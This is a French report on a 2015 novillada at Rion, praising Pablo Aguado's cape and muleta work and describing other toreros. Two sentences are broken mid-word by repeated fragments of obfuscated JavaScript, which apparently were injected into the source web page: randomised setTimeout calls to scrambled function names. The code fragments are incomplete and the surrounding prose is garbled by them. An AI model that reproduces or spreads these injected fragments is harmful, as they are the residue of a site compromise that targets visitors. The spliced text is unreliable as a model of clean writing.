RION 2015 : LE TOREO LUXURIANT DE PABLO AGUADO

Le novillero de Séville a de nouveau triomphé dans ces arènes landom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andaises, démontrant une nouvelle fois qu’il faut compter sur lui pour l’avenir. Il a déployé un toreo très expressif à la cape, avec des passes au ralenti dès la première véronique et il a provoqué des frissons avec un quite avec des chicuelinas extrêmement ajustées. Le novillo des frères Jalabert sembla s’éteindre par la suite, peu collaborateur sur la corne droite, par contre sur la gauche il permit à Pablo Aguado de signer des naturelles de très belle facture. Il acheva son adversaire d’une estocade entière et lui coupa la queue.

Au cours de cette matinale se distingua également Juan del Alamo, devant un novillo sans race, avec un engagement total. Faena tenace, de domination, celle d’un torero sur la bonne voie et prêt à en découdre avec tous. Le public landom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andais a aussi pris du plaisir avec le toreo aux arômes d’un autre temps du vétéran matador Patrick Varin. Que ce soit à la cape ou à la muleta il y eut des fulgurances de cette esthétique que détient encore l’actuel professeur de l’école taurine de Nîmes. Juan Bautista fut confronté à un novillo impossible, décasté et violent. En dernier, le novillero en non piquée Adrien Salenc, triomphateur cette saison dans le sud ouest, se montra varié et vibrant à la cape et persévérant à la muleta.

foto bruno Lasnier

titre3

Les commentaires sont fermés.